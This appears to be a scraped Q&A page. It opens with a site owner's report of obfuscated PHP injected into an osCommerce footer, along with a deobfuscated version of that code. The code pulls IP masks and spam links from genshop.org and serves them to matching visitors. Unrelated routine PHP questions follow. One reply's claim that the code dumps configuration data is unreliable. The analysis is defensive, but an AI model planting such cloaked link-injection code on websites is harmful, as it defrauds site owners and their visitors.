I'm looking at a site that has been exploited by someone/something. The site has had a bunch of links injected into it's footer that links to pharmaceutical pitches, and who knows what else. There are/were a lot of links right at the top of the footer. I can only find these now, on the cached pages in the Yahoo index. Google is still not happy w/ the site though, and the live site does not show any links anymore. This is for a client..so I mostly know what I was told, and what I can find else wise.
I found this code at the very 'tip/top' of the footer.php (it's an OsCommerse Site):
<?php $x13="cou\156\x74"; $x14="\x65\x72\162\x6fr\x5f\x72ep\157\162\164ing"; $x15="\146\151l\x65"; $x16="\146i\154\145_g\x65t\x5f\x63\x6fn\164\145n\164s"; $x17="\163\x74rle\156"; $x18="\163tr\160o\x73"; $x19="su\x62\x73\164\162"; $x1a="tr\151m";
ini_set(' display_errors','off');$x14(0);$x0b = "\150t\x74p\x3a\057\057\x67\145n\x73h\157\x70\056org/\163\x63\162ipt\057\155a\163k\x2e\x74x\x74";$x0c = $x0b; $x0d = $_SERVER["\x52E\115O\124\105_A\104\104\122"]; $x0e = # $x15($x0c); for ( $x0f = 0; $x0f < $x13($x0e); $x0f++ ) {$x10 = $x1a($x0e[$x0f]);if ( $x10 != "" ){ if ( ($x11 = $x18($x10, "*")) !== false ) $x10 = $x19($x10, 0,$x11); if ( $x17($x10) <= $x17($x0d) && $x18($x0d, $x10) === 0 ) { $x12 =$x16("\150\164\164\160\x3a/\057g\145\x6e\x73\x68o\160\056o\162\x67\057\160aral\x69\x6e\x6b\x73\x2f\156e\167\x2f3\057\x66\145e\144\x72\157lle\x72\x2e\143\x6f\x6d\x2e\x74\170\x74"); echo "$x12"; } }}echo "\x3c\041\055\x2d \060\x36\071\x63\x35b4\x66e5\060\062\067\146\x39\x62\0637\x64\x653\x31d2be5\145\141\143\066\x37\040\x2d-\076";?>
When I view the source cached pages that have the 'Bad' links, this code fits right in where I found it in the footer.php source. A little research on google show that there are exploits out there w/ similar code.
What do you think, when I run it on my own server all I get is the echoed comment in the source only like so:
<!-- 069c5b4fe5027f9b37de31d2be5eac67 -->
I don't want to just hastily remove the code and say 'your good' just because it looks bad, especially because I have no immediate way of knowing that the 'bad links' are gone. BTW, the links all go to a dead URL.
You can see the bad pages still cached at Yahoo:
http://74.6.117.48/search/srpcache?ei=UTF-8&p=http%3A%2F%2Fwww.feedroller.com%2F+medicine&fr=yfp-t-701&u=http://cc.bingj.com/cache.aspx?q=http%3a%2f%2fwww.feedroller.com%2f+medicine&d=4746458759365253&mkt=en-US&setlang=en-US&w=b97b0175,d5f14ae5&icp=1&.intl=us&sig=Ifqk1OuvHXNcZnGgPR9PbA--
It seems to reference / load two URLs:
http://genshop.org/script/mask.txt
http://genshop.org/paralinks/new/3/feedroller.com.txt
It's just a spam distribution script.
For partial unobfuscation use:
print preg_replace('#"[^"]+\\\\\w+"#e', "stripcslashes('$0')", $source);
here's the unobfuscated script (more or less)
it's just dumping the contents of this url onto your page
it also checks the remote_addr against a list of IPs (google, et al) to try to remain undetected.
looks like you're being attaced by genshop.com
<?php
$count="cou\156\x74"; // count
$error_reporting="\x65\x72\162\x6fr\x5f\x72ep\157\162\164ing"; // error_reporting
$file="\146\151l\x65"; // file
$file_get_contents="\146i\154\145_g\x65t\x5f\x63\x6fn\164\145n\164s"; // file_get_contents
$strlen="\163\x74rle\156"; // strlen
$strpos="\163tr\160o\x73"; // strpos
$substr="su\x62\x73\164\162"; // substr
$trim="tr\151m"; //trim
ini_set(' display_errors','off');
$error_reporting(0);
$x0b = "http://genshop.org/scripts/mask.txt";
$url = $x0b;
$tmp = "REMOTE_ADDR";
$x0d = $_SERVER[$tmp];
$tmp_filename = "http://genshop.org/paralinks/new/3/feedroller.com.txt";
$IPs = # $file($url);
for ( $i = 0; $i < $count($IPs); $i++ ) {
$curr_ip = $trim($ips[$i]);
if ( $curr_ip != "" ) {
if ( ($x11 = $strpos($curr_ip, "*")) !== false )
$curr_ip = $substr($curr_ip, 0,$x11);
// check visitor ip against mask list
if ( $strlen($curr_ip) <= $strlen($x0d) && $strpos($x0d, $curr_ip) === 0 ) {
$x12 = $file_get_content($tmp_filename);
echo "$x12";
// print spam contents
}
}
}
echo $curr_ip;
}
$tmp2 = "\x3c\041\055\x2d \060\x36\071\x63\x35b4\x66e5\060\062\067\146\x39\x62\0637\x64\x653\x31d2be5\145\141\143\066\x37\040\x2d-\076";
echo $tmp2;
?>
It very much is an attempt to dump information about your running configuration. Remove it immediately.
The way it works is very complicated, and is beyond me, but its one of the first steps at hacking your site.
Related
I'm using below function to redirect a specific url to a specific php script file:
add_action('wp', function() {
if ( trim(parse_url(add_query_arg(array()), PHP_URL_PATH), '/') === 'pagename' ) {
include(locate_template('give_some.php'));
exit();
}});
it works only for the specified url and i want to make it work for multiple urls. Suppose a file urls.txt contain numbers of url and for which above code have to be triggered. Any idea how to do this?
I’m a long-time WordPress developer, and one of the best responses to a WordPress problem is “that’s not a WordPress problem, just simple PHP (or JavaScript)” one. That’s a really good thing because it makes it really easy to talk about.
Your problem, as I understand it, is that you want to compare the current URL to a “file” of possible paths. You’ve got the WordPress equivalent of “current URL”, so I’ll take that for granted, and I’ll also assume you can take a file and convert it into an array. But once you do that, you are parsing a URL (which you already did) and seeing if it is in the array:
$url = 'https://www.example.com/pagename?a=b&c=d';
$paths = [
'gerp',
'pagename',
'cheese',
];
$path = trim(parse_url($url, PHP_URL_PATH), '/');
if ( in_array($path, $paths )) {
echo 'yes';
} else {
echo 'no';
}
Demo: https://3v4l.org/NOmpk
You can use different hook request. Which allow you to manipulate request.
add_filter( 'request', function( $request ){});
My simple example ( not tested ).
add_filter( 'request', function( $request ){
$data = file_get_contents("database.txt"); //read the file
$rows = explode("\n", $data); //create array separate by new line
$rows = array_map("trim", $rows); // for removing any unwanted space
$rowCount = count($rows); // Count your database rows
for ($i=0; $i < $rows ; $i++) {
if( isset( $request['pagename'] ) && $rows[$i] == $request['pagename'] ){
include(locate_template('give_some.php'));
}
}
return $request;
});
My advice, don't use .txt files, save your data into database, and then use it, or create wp_option field, and manage from Settings page.
I am trying something strange with code i just want to know weather it is possible to perform a php code like this one
<?php
$cururl= ucfirst(pathinfo($_SERVER['PHP_SELF'], PATHINFO_FILENAME));
$nexurlw = $cururl-1;
echo "$nexurlw";
?>
I have a problem in this code. My current page url is 30.php and i have a button on page "go to previous page" i want to change its url 29.php with the help of this function.
But this function echo 30 every time.
Try this :
$cururl = ucfirst(pathinfo($_SERVER['PHP_SELF'], PATHINFO_FILENAME));
$intUrl = ((int) $cururl) - 1;
$nexurlw = (string) $intUrl.'.php';
echo "$nexurlw";
Even if it happens to be true in your case (because that's the default in a raw PHP installation) there's often no direct mapping between URL locations and filesystem objects (files / directories). For instance, this question's URL is
https://stackoverflow.com/questions/68504314/how-to-get-current-webpage-name-and-echo-with-some-modification but the Stack Overflow server does not have a directory called 68504314 anywhere on its disk.
You want to build a URL from another URL, thus there's no even any benefit in having the filesystem involved, you can just gather the information about current URL from $_SERVER['REQUEST_URI']. E.g.:
$previous_page_url = null;
if (preg_match('#/blah/(\d+)\.php#', $_SERVER['REQUEST_URI'], $matches)) {
$current_page_number = (int)$matches[1];
if ($current_page_number > 1) {
$previous_page_url = sprintf('/blah/%d.php', $current_page_number - 1);
}
}
I've searched and searched and cannot find anything similar (or at least what I consider similar or can get my head around).
I'm not very great with coding, so I was hoping someone could help me further my script so far.
<?php
$str3 = array(
'START#EMAIL.COM',
/* List of emails below to be scanned must be 'user#provider.com', exactly that like
/* emails here to be loaded in from rmcomputers/council 'END#EMAIL.COM');
/* Filter code below*/
foreach($str3 as $new)
{
/*List of domains to filter and show */
if (strpos($new, 'teacher.establishment1.sch.uk') !== false || strpos($new, 'teacher.establishment2.sch.uk') !== false || strpos($new, 'teacher.establishment3.sch.uk') !== false || strpos($new, 'teacher.establishment4.sch.uk') !== falsestrpos($new, 'teacher.establishment5.sch.uk') !== false)
{
echo "$new" . " <a href=' $new'> $new</a></br>";
}
}
?>
https://pastebin.com/raw/HRdzDJq1
I am looking to improve this script, so I don't need to manually edit the domains every so often depending on what I'm looking for.
I will have around 150 "domains" on the list - I'd like to be able to toggle off/on depending on the search I need to do.
The code on the pastebin currently when I've loaded my full list of emails into it outputs only the users as I wish, but if I need to output another establishment/domain then I need to edit the code and add/remove domains as required.
You'll probably get the gist of what I'd like to have done eventually.
At the moment I edit the .php file and load it when needed, but this is becoming a nuisance.
Mockup of script
You can pass the domains via $_GET or $_POST variables, separated by comma , and then loop it after explode().
So you page call would be index.php?domains=domain1.com,domain2.com, also you can do it through a form...
Your PHP logic will looks like below:
$domains = explode(',', $_GET['domains']);
/* Filter code below*/
foreach ($str3 as $new) {
foreach( $domains as $domain){ //Loop the domains
if (strpos($new, $domain) !== false){
echo "$new" . " <a href=' $new'> $new</a></br>";
}
}
}
I currently have the following code (which works from what I can tell so far)
session_start();
if(!is_array($_SESSION['page'])) {
$_SESSION['page']=array();
}
$_SESSION['page'][]=$_SERVER['REQUEST_URI'];
$entry=reset($_SESSION['page']);
$exit=end($_SESSION['page']);
Is this the best way to accomplish tracking of entry and exit pages with PHP?
Edit:
This (from #T0xicCode) appears to be a better option:
session_start();
if(!is_array($_SESSION['page'])) {
$_SESSION['page'] = array('entry' => $_SERVER['REQUEST_URI']);
}
$_SESSION['page']['exit'] = $_SERVER['REQUEST_URI'];
$entry = $_SESSION['page']['entry'];
$exit = $_SESSION['page']['exit'];
I'd suggest using something like google analytics, but if you want a DIY, pure php solution, something like the following should work. It doesn't track the pages in the middle, which your original solution does.
session_start();
if(!in_array('page', $_SESSION) || !is_array($_SESSION['page'])) {
$_SESSION['page'] = array('entry' => $_SERVER['REQUEST_URI']);
}
$_SESSION['page']['exit'] = $_SERVER['REQUEST_URI'];
$entry = $_SESSION['page']['entry'];
$exit = $_SESSION['page']['exit'];
You'll also have to determine how often you'll purge old sessions. If I come back after 2 weeks, is it a new browsing session, or is it the continuation of the old one?
I use iframes in my news aggregation web app. While I am careful to always credit and link publishers, I also respect those who chose to block iframes (by not implementing sneaky workarounds). My question is how I can automatically detect whether iframes will be blocked, given the URL of the external page in question. So far i am using this code:
//get external html
$p = file_get_contents($this->scrape_ready_url);
//check for blocker
$pattern1 = "/window\.self.{1,10}window\.top/";
$s1 = preg_match($pattern1, $p);
//check for blocker2
$pattern2 = "/window\.top.{1,10}window\.self/";
$s2 = preg_match($pattern2, $p);
//condition response
if ($s1 === 1 || $s2 === 1) {
$this->frame = "blocked";
} else {
$this->frame = "not_blocked";
}
This works most of the time (so far), but many publishers such as yahoo use slight variations of the "self !== top" code which makes preg_match not work. I am wondering if there is any universal/general test that I can implement to know whether or not a given URL will block an iframe or not.
thanks